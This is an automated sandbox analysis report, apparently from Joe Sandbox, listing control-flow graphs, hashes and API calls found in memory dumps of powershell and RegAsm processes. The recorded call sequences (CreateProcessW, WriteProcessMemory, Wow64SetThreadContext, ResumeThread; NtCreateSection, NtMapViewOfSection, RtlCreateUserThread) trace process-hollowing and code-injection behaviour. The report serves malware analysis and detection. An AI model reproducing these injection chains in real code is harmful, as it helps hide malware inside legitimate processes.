                                                        control_flow_graph 0 210203c-210203f 1 2102041-2102043 0->1 2 2102045-210204d 0->2 1->2 3 2102065-2102069 2->3 4 210204f-2102054 2->4 5 2102194-210219e 3->5 6 210206f-2102073 3->6 7 2102055 4->7 8 2102059-2102063 4->8 9 21021a0-21021a9 5->9 10 21021ac-21021b2 5->10 11 21020b3 6->11 12 2102075-2102086 6->12 7->8 13 2102057 7->13 8->3 14 21021b4-21021b6 10->14 15 21021b8-21021c4 10->15 16 21020b5-21020b7 11->16 21 21021ec-210223b 12->21 22 210208c-2102091 12->22 13->3 19 21021c6-21021e9 14->19 15->19 16->5 20 21020bd-21020c1 16->20 20->5 24 21020c7-21020cb 20->24 35 2102241-2102246 21->35 36 210243e-210244d 21->36 25 2102093-2102099 22->25 26 21020a9-21020b1 22->26 24->5 28 21020d1-21020f7 24->28 29 210209b 25->29 30 210209d-21020a7 25->30 26->16 28->5 43 21020fd-2102101 28->43 29->26 30->26 38 2102248-210224e 35->38 39 210225e-2102262 35->39 41 2102250 38->41 42 2102252-210225c 38->42 44 21023e7-21023f1 39->44 45 2102268-210226a 39->45 41->39 42->39 47 2102103-210210c 43->47 48 2102124 43->48 51 21023f3-21023fa 44->51 52 21023fd-2102403 44->52 49 210227a 45->49 50 210226c-2102278 45->50 54 2102113-2102120 47->54 55 210210e-2102111 47->55 57 2102127-2102134 48->57 56 210227c-210227e 49->56 50->56 58 2102405-2102407 52->58 59 2102409-2102415 52->59 60 2102122 54->60 55->60 56->44 61 2102284-21022a3 56->61 64 210213a-2102191 57->64 62 2102417-210243b 58->62 59->62 60->57 71 21022b3 61->71 72 21022a5-21022b1 61->72 73 21022b5-21022b7 71->73 72->73 73->44 74 21022bd-21022c1 73->74 74->44 75 21022c7-21022cb 74->75 76 21022cd-21022dc 75->76 77 21022de 75->77 78 21022e0-21022e2 76->78 77->78 78->44 79 21022e8-21022ec 78->79 79->44 80 21022f2-2102311 79->80 83 2102313-2102319 80->83 84 2102329-2102334 80->84 87 210231b 83->87 88 210231d-210231f 83->88 85 2102343-210235f 84->85 86 2102336-2102339 84->86 89 2102361-2102374 85->89 90 210237c-2102386 85->90 86->85 87->84 88->84 89->90 91 2102388 90->91 92 210238a-21023d8 90->92 93 21023dd-21023e4 91->93 92->93
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L4#p$L4#p$L4#p$d=<
                                                        • API String ID: 0-507092061
                                                        • Opcode ID: 33588de4f374ec5a16840d045f5a11ceb1dec5095eb3a29ff1b23add80fbd7c9
                                                        • Instruction ID: bec4626cc04b887df07b71428ce8ab0c7086e84659dcaca8ce68a556331879fa
                                                        • Opcode Fuzzy Hash: 33588de4f374ec5a16840d045f5a11ceb1dec5095eb3a29ff1b23add80fbd7c9
                                                        • Instruction Fuzzy Hash: DFB10531740208DFDF199F64C888BAE7BA2AF89314F14846AED518F2D5CBB1DD45CB92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 100 2100b98-2100bbb 101 2100bc1-2100bc6 100->101 102 2100d96-2100ddb 100->102 103 2100bc8-2100bce 101->103 104 2100bde-2100be2 101->104 112 2100de1-2100de6 102->112 113 2100f32-2100f7e 102->113 108 2100bd0 103->108 109 2100bd2-2100bdc 103->109 105 2100d43-2100d4d 104->105 106 2100be8-2100bec 104->106 114 2100d5b-2100d61 105->114 115 2100d4f-2100d58 105->115 110 2100bee-2100bfd 106->110 111 2100bff 106->111 108->104 109->104 119 2100c01-2100c03 110->119 111->119 120 2100de8-2100dee 112->120 121 2100dfe-2100e02 112->121 132 2100f84-2100f89 113->132 133 21010eb-210111d 113->133 117 2100d63-2100d65 114->117 118 2100d67-2100d73 114->118 122 2100d75-2100d93 117->122 118->122 119->105 125 2100c09-2100c29 119->125 127 2100df0 120->127 128 2100df2-2100dfc 120->128 123 2100e08-2100e0a 121->123 124 2100edf-2100ee9 121->124 130 2100e1a 123->130 131 2100e0c-2100e18 123->131 134 2100ef7-2100efd 124->134 135 2100eeb-2100ef4 124->135 163 2100c48 125->163 164 2100c2b-2100c46 125->164 127->121 128->121 137 2100e1c-2100e1e 130->137 131->137 140 2100fa1-2100fa5 132->140 141 2100f8b-2100f91 132->141 158 210112d 133->158 159 210111f-210112b 133->159 142 2100f03-2100f0f 134->142 143 2100eff-2100f01 134->143 137->124 146 2100e24-2100e28 137->146 144 210109a-21010a4 140->144 145 2100fab-2100fad 140->145 148 2100f93 141->148 149 2100f95-2100f9f 141->149 150 2100f11-2100f2f 142->150 143->150 160 21010b2-21010b8 144->160 161 21010a6-21010af 144->161 152 2100fbd 145->152 153 2100faf-2100fbb 145->153 154 2100e48 146->154 155 2100e2a-2100e46 146->155 148->140 149->140 169 2100fbf-2100fc1 152->169 153->169 167 2100e4a-2100e4c 154->167 155->167 170 210112f-2101131 158->170 159->170 165 21010ba-21010bc 160->165 166 21010be-21010ca 160->166 172 2100c4a-2100c4c 163->172 164->172 177 21010cc-21010e8 165->177 166->177 167->124 171 2100e52-2100e65 167->171 169->144 173 2100fc7-2100fc9 169->173 175 2101133-2101139 170->175 176 210117d-2101187 170->176 204 2100e6b-2100e6d 171->204 172->105 183 2100c52-2100c54 172->183 184 2100fd9 173->184 185 2100fcb-2100fd7 173->185 186 2101147-2101164 175->186 187 210113b-210113d 175->187 179 2101192-2101198 176->179 180 2101189-210118f 176->180 188 210119a-210119c 179->188 189 210119e-21011aa 179->189 192 2100c64 183->192 193 2100c56-2100c62 183->193 195 2100fdb-2100fdd 184->195 185->195 201 2101166-2101177 186->201 202 21011ca-21011cf 186->202 187->186 197 21011ac-21011c7 188->197 189->197 199 2100c66-2100c68 192->199 193->199 195->144 200 2100fe3-2100fe5 195->200 199->105 205 2100c6e-2100c8e 199->205 207 2100fe7-2100fed 200->207 208 2100fff-2101003 200->208 201->176 202->201 212 2100e85-2100edc 204->212 213 2100e6f-2100e75 204->213 229 2100c90-2100c96 205->229 230 2100ca6-2100caa 205->230 214 2100ff1-2100ffd 207->214 215 2100fef 207->215 209 2101005-210100b 208->209 210 210101d-2101097 208->210 216 210100d 209->216 217 210100f-210101b 209->217 219 2100e77 213->219 220 2100e79-2100e7b 213->220 214->208 215->208 216->210 217->210 219->212 220->212 234 2100c98 229->234 235 2100c9a-2100c9c 229->235 231 2100cc4-2100cc8 230->231 232 2100cac-2100cb2 230->232 238 2100ccf-2100cd1 231->238 236 2100cb4 232->236 237 2100cb6-2100cc2 232->237 234->230 235->230 236->231 237->231 240 2100cd3-2100cd9 238->240 241 2100ce9-2100d40 238->241 242 2100cdb 240->242 243 2100cdd-2100cdf 240->243 242->241 243->241
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8#f$8#f$l;<$l;<
                                                        • API String ID: 0-535497228
                                                        • Opcode ID: 53f79b188660924564f49c67698336f99d2e8696012b712b00b25bfb1ad5f43d
                                                        • Instruction ID: 7128d597eaf004deafbb7af83c50b167e4a5aa1518b3899953a1a117f492ba5c
                                                        • Opcode Fuzzy Hash: 53f79b188660924564f49c67698336f99d2e8696012b712b00b25bfb1ad5f43d
                                                        • Instruction Fuzzy Hash: B1F15A317402059FDB299E78C8907BAB7E2AFC9310F2580BAD459DB3D1DBB1D941C7A2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 245 30172c-3059c3 247 3059c5-3059d7 245->247 248 3059da-3059e8 245->248 247->248 249 3059ea-3059fc 248->249 250 3059ff-305a3b 248->250 249->250 251 305a3d-305a4c 250->251 252 305a4f-305b2a CreateProcessW 250->252 251->252 256 305b33-305bfc 252->256 257 305b2c-305b32 252->257 266 305c32-305c3d 256->266 267 305bfe-305c27 256->267 257->256 270 305c3e 266->270 267->266 270->270
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00305B17
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 32ccdc63f38f2e59ce5e0be3b5dbea7b39711924dd41303883ab85fadd289bf7
                                                        • Instruction ID: 974ec573ccc7bc92128f7f9b55cbd813aa20e2e8fbda703d8915a4dcecaaa3b0
                                                        • Opcode Fuzzy Hash: 32ccdc63f38f2e59ce5e0be3b5dbea7b39711924dd41303883ab85fadd289bf7
                                                        • Instruction Fuzzy Hash: D381C0B4D0022D9FDB25DFA5D880BEEBBB1AF59304F0090AAE549B7250DB709E85CF54

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 272 305936-3059c3 274 3059c5-3059d7 272->274 275 3059da-3059e8 272->275 274->275 276 3059ea-3059fc 275->276 277 3059ff-305a3b 275->277 276->277 278 305a3d-305a4c 277->278 279 305a4f-305b2a CreateProcessW 277->279 278->279 283 305b33-305bfc 279->283 284 305b2c-305b32 279->284 293 305c32-305c3d 283->293 294 305bfe-305c27 283->294 284->283 297 305c3e 293->297 294->293 297->297
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00305B17
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: fc50242078307018b4571fe16a9c862471c470e446c13af973c10dc56a035495
                                                        • Instruction ID: 97d1a2b870aec862b938afc888203704ae5859011a581292c057387b25658f76
                                                        • Opcode Fuzzy Hash: fc50242078307018b4571fe16a9c862471c470e446c13af973c10dc56a035495
                                                        • Instruction Fuzzy Hash: DF81B0B4D0022D9FDB25DF65D880BEEBBB1AF49304F0090AAE549B7250DB709E85CF54

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 299 301774-306007 301 306009-30601b 299->301 302 30601e-30607e WriteProcessMemory 299->302 301->302 303 306080-306086 302->303 304 306087-3060c5 302->304 303->304
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0030606E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 3f5f4c7a26aee23cdd1373cea239d098d7243de8199d7895e4fa41a12423f0b3
                                                        • Instruction ID: 8e070d51bc3d373f18e05c7588edf322260e31020a3046cefaa65ef45e6c8ced
                                                        • Opcode Fuzzy Hash: 3f5f4c7a26aee23cdd1373cea239d098d7243de8199d7895e4fa41a12423f0b3
                                                        • Instruction Fuzzy Hash: 1641A9B5D042589FCB00CFA9D984ADEFBF1BB09310F24902AE818B7350D375AA55CF64

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 307 301738-305ccc 309 305ce3-305d2a Wow64SetThreadContext 307->309 310 305cce-305ce0 307->310 311 305d33-305d6b 309->311 312 305d2c-305d32 309->312 310->309 312->311
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00305D1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 02776a7cc297a9b1e7b663056a5afae6cccac3079ace2b0ee5d5e0dc39917c38
                                                        • Instruction ID: 34a8441f4cd59e403ed353591318ad8d683a926dc871f90142d3c78e26b2c797
                                                        • Opcode Fuzzy Hash: 02776a7cc297a9b1e7b663056a5afae6cccac3079ace2b0ee5d5e0dc39917c38
                                                        • Instruction Fuzzy Hash: 39319BB5D012589FCB10CFA9D988ADEFBF5BB49314F24902AE418B7350D378AA45CF54

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 315 301780-305ccc 317 305ce3-305d2a Wow64SetThreadContext 315->317 318 305cce-305ce0 315->318 319 305d33-305d6b 317->319 320 305d2c-305d32 317->320 318->317 320->319
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00305D1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 1c4f779c2c15b75a5ef39ffefe322b0d5343f6d6fe2a2ce3b3fc4e2e54208f98
                                                        • Instruction ID: 28273ddc0ce7552a5b632c412e81d97be5d777c1238892dbeee83b969ca9fd91
                                                        • Opcode Fuzzy Hash: 1c4f779c2c15b75a5ef39ffefe322b0d5343f6d6fe2a2ce3b3fc4e2e54208f98
                                                        • Instruction Fuzzy Hash: B431ABB4D012589FCB10CFA9D588ADEFBF1BB49314F24802AE418B7350D378AA45CF54

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 323 305c6e-305ccc 325 305ce3-305d2a Wow64SetThreadContext 323->325 326 305cce-305ce0 323->326 327 305d33-305d6b 325->327 328 305d2c-305d32 325->328 326->325 328->327
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00305D1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 336a6fcc69342d992dee38dae77434ee5d374e391554c9b8b19337891601b124
                                                        • Instruction ID: b207b95d869a1d1d633f67f5235ed3cf619d204453daeb2f4cf80e49aa9dcf58
                                                        • Opcode Fuzzy Hash: 336a6fcc69342d992dee38dae77434ee5d374e391554c9b8b19337891601b124
                                                        • Instruction Fuzzy Hash: 6D319BB5D012589FCB10CFAAD984ADEFBF1BB49314F24802AE418B7350D378AA45CF64

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 331 301798-306166 ResumeThread 333 306168-30616e 331->333 334 30616f-30619d 331->334 333->334
                                                        APIs
                                                        • ResumeThread.KERNELBASE(?), ref: 00306156
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 654feb590590822bbf9e557a2c30effaf9aa7e630bbf1754a377d1d39a89713f
                                                        • Instruction ID: 9348d5c5b7bc4b16649f99e81c0afd5a59e81a75e68b0f3d3497774e21ac6873
                                                        • Opcode Fuzzy Hash: 654feb590590822bbf9e557a2c30effaf9aa7e630bbf1754a377d1d39a89713f
                                                        • Instruction Fuzzy Hash: AD21AAB8D002189FCB10CFA9D484ADEFBF4EB49310F20902AE819B7350D374A945CFA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 503 2101730-2101733 504 2101735-2101737 503->504 505 2101739-2101741 503->505 504->505 506 2101743-2101748 505->506 507 2101759-210175d 505->507 508 2101749 506->508 509 210174d-2101757 506->509 510 2101763-2101765 507->510 511 210188e-2101898 507->511 508->509 512 210174b 508->512 509->507 513 2101775 510->513 514 2101767-2101773 510->514 515 21018a6-21018ac 511->515 516 210189a-21018a3 511->516 512->507 518 2101777-2101779 513->518 514->518 519 21018b2-21018be 515->519 520 21018ae-21018b0 515->520 518->511 521 210177f-2101783 518->521 522 21018c0-21018df 519->522 520->522 524 2101785-2101794 521->524 525 2101796 521->525 526 2101798-210179a 524->526 525->526 526->511 528 21017a0-21017a2 526->528 529 21017b2 528->529 530 21017a4-21017b0 528->530 532 21017b4-21017b6 529->532 530->532 532->511 533 21017bc-21017be 532->533 534 21017c0-21017c6 533->534 535 21017d8-21017e3 533->535 536 21017c8 534->536 537 21017ca-21017d6 534->537 538 21017f2-21017fe 535->538 539 21017e5-21017e8 535->539 536->535 537->535 540 2101800-2101802 538->540 541 210180c-2101813 538->541 539->538 540->541 543 210181a-210181c 541->543 544 2101834-210188b 543->544 545 210181e-2101824 543->545 546 2101826 545->546 547 2101828-210182a 545->547 546->544 547->544
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 84627cd6b653bb64740f72cbbdc04634969f07a12be3d183bb89d9e2e7e2535e
                                                        • Instruction ID: 701cd088e539fa711077e3f40ba82731f4dba0c0ae860dc4259f288039eb13b7
                                                        • Opcode Fuzzy Hash: 84627cd6b653bb64740f72cbbdc04634969f07a12be3d183bb89d9e2e7e2535e
                                                        • Instruction Fuzzy Hash: 2F415C35780101FBDB294E64D4C06BAB3E1AFC1310B2881BBD8698B2D1DBF8D941C756

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 585 ed006-ed03d 586 ed03f-ed04a 585->586 587 ed08d-ed095 585->587 588 ed04c-ed05a 586->588 589 ed082-ed089 586->589 587->586 592 ed060 588->592 589->588 593 ed08b 589->593 594 ed063-ed06b 592->594 593->594 595 ed06d-ed075 594->595 596 ed07b-ed080 594->596 596->595
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453774641.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_ed000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7215d0e7d6f52b4814dfb155e0d314c883b77735468c284a731aded9e849790e
                                                        • Instruction ID: 82a367f25378c2ca12b3f0ff40bb9b5b0954cf5b92670303b19cb25ccb7961ab
                                                        • Opcode Fuzzy Hash: 7215d0e7d6f52b4814dfb155e0d314c883b77735468c284a731aded9e849790e
                                                        • Instruction Fuzzy Hash: 17015E6110D3C09FD7128B258C94B52BFB4DF43224F1D81DBD8889F2A3C2699C48CB72

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 598 ed01d-ed03d 599 ed03f-ed04a 598->599 600 ed08d-ed095 598->600 601 ed04c-ed05a 599->601 602 ed082-ed089 599->602 600->599 605 ed060 601->605 602->601 606 ed08b 602->606 607 ed063-ed06b 605->607 606->607 608 ed06d-ed075 607->608 609 ed07b-ed080 607->609 609->608
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453774641.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_ed000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 364de623a5b714d9f7661d5bbcef8b3f23d5a74f7f17e8e8a67a2a9ca6249c40
                                                        • Instruction ID: 7440d1837cf65d09b2cd87ba66e3a1070fdb76e5f7eeb8a88432f109a63f53fe
                                                        • Opcode Fuzzy Hash: 364de623a5b714d9f7661d5bbcef8b3f23d5a74f7f17e8e8a67a2a9ca6249c40
                                                        • Instruction Fuzzy Hash: E301F231104380AEE7209E26C8C4B6ABBD8DF81324F1CC01BED492B282C2799941DAB1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b621e7ca8025baa491a3807ec40e8a1cd2b9c3dcb093b08a207b25ade3c7c77e
                                                        • Instruction ID: 683905b903523b3fae9f07b5c4bfd831c3a5266afc8c23708bf6d0236b06b1ef
                                                        • Opcode Fuzzy Hash: b621e7ca8025baa491a3807ec40e8a1cd2b9c3dcb093b08a207b25ade3c7c77e
                                                        • Instruction Fuzzy Hash: E5E06831B44204AADF39662480E03EC77616FE3210F0181E6C47493285DBB88805C352
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (:<$(:<$(:<$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:<$L:<$L:<
                                                        • API String ID: 0-3428091537
                                                        • Opcode ID: 3e342c2faa4d90fe3f534afd34c0418639300a5344bc4bf4c69e1a08ee3b8639
                                                        • Instruction ID: 37fbcc2889f03db948ad6ca2ee6d64ed6dabe31ae3fe39a39051f23574c210aa
                                                        • Opcode Fuzzy Hash: 3e342c2faa4d90fe3f534afd34c0418639300a5344bc4bf4c69e1a08ee3b8639
                                                        • Instruction Fuzzy Hash: 66D12631B44208EFDF159F64D890BBE77A2AF89310F14806AE9559B2D1CBB1DD81CB92

                                                        Execution Graph

                                                        Execution Coverage:8.9%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:52.9%
                                                        Total number of Nodes:68
                                                        Total number of Limit Nodes:2
                                                        execution_graph 1997 402d65 1998 402d69 1997->1998 1999 4018a6 8 API calls 1998->1999 2000 402ea5 1998->2000 1999->2000 2005 401706 2006 4016ea 2005->2006 2008 401789 2006->2008 2009 4017b4 2008->2009 2012 40328d 2009->2012 2011 4017e8 2011->2006 2014 40323d 2012->2014 2015 40327d 2012->2015 2013 4032a1 Sleep 2013->2014 2014->2012 2014->2013 2014->2015 2015->2011 2101 4018b1 2102 4018b5 2101->2102 2103 401903 2101->2103 2105 4018ee Sleep 2102->2105 2104 4014bf 7 API calls 2103->2104 2106 40191a 2103->2106 2104->2106 2105->2103 2044 4014d6 2045 4014c4 2044->2045 2046 40156f NtDuplicateObject 2045->2046 2054 40168b 2045->2054 2047 40158c NtCreateSection 2046->2047 2046->2054 2048 4015b2 NtMapViewOfSection 2047->2048 2049 40160c NtCreateSection 2047->2049 2048->2049 2050 4015d5 NtMapViewOfSection 2048->2050 2051 401638 2049->2051 2049->2054 2050->2049 2052 4015f3 2050->2052 2053 401642 NtMapViewOfSection 2051->2053 2051->2054 2052->2049 2053->2054 2055 401669 NtMapViewOfSection 2053->2055 2055->2054 1993 402f5d 1994 4030b4 1993->1994 1995 402f87 1993->1995 1995->1994 1996 403042 RtlCreateUserThread NtTerminateProcess 1995->1996 1996->1994 1967 402dfe 1968 402dee 1967->1968 1970 402ea5 1968->1970 1971 4018a6 1968->1971 1972 4018b7 1971->1972 1973 4018ee Sleep 1972->1973 1974 401903 1973->1974 1976 40191a 1974->1976 1977 4014bf 1974->1977 1976->1970 1978 4014ce 1977->1978 1979 40156f NtDuplicateObject 1978->1979 1981 40168b 1978->1981 1980 40158c NtCreateSection 1979->1980 1979->1981 1982 4015b2 NtMapViewOfSection 1980->1982 1983 40160c NtCreateSection 1980->1983 1981->1976 1982->1983 1984 4015d5 NtMapViewOfSection 1982->1984 1983->1981 1985 401638 1983->1985 1984->1983 1988 4015f3 1984->1988 1985->1981 1986 401642 NtMapViewOfSection 1985->1986 1986->1981 1987 401669 NtMapViewOfSection 1986->1987 1987->1981 1988->1983 2107 4018be 2108 4018b7 2107->2108 2109 4018ee Sleep 2108->2109 2110 401903 2109->2110 2111 4014bf 7 API calls 2110->2111 2112 40191a 2110->2112 2111->2112 2113 4016be 2114 4016d3 2113->2114 2115 401789 Sleep 2114->2115 2115->2114 1989 4030bf 1990 403055 RtlCreateUserThread NtTerminateProcess 1989->1990 1992 4030d1 1989->1992 1991 4030b4 1990->1991 1992->1992

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 21 401540-401569 16->21 22 40184b 16->22 17->14 20 40185a-401883 17->20 30 401874-40187f 20->30 31 401886-4018a3 call 401164 20->31 21->22 29 40156f-401586 NtDuplicateObject 21->29 22->20 29->22 32 40158c-4015b0 NtCreateSection 29->32 30->31 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->22 38 401638-40163c 35->38 37->35 41 4015f3-401609 37->41 38->22 42 401642-401663 NtMapViewOfSection 38->42 41->35 42->22 44 401669-401685 NtMapViewOfSection 42->44 44->22 46 40168b call 401690 44->46
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectView
                                                        • String ID:
                                                        • API String ID: 1652636561-0
                                                        • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                        • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                                        • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                        • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 68 401540-401569 63->68 69 40184b 63->69 64->61 67 40185a-401883 64->67 77 401874-40187f 67->77 78 401886-4018a3 call 401164 67->78 68->69 76 40156f-401586 NtDuplicateObject 68->76 69->67 76->69 79 40158c-4015b0 NtCreateSection 76->79 77->78 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->69 85 401638-40163c 82->85 84->82 88 4015f3-401609 84->88 85->69 89 401642-401663 NtMapViewOfSection 85->89 88->82 89->69 91 401669-401685 NtMapViewOfSection 89->91 91->69 93 40168b call 401690 91->93
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
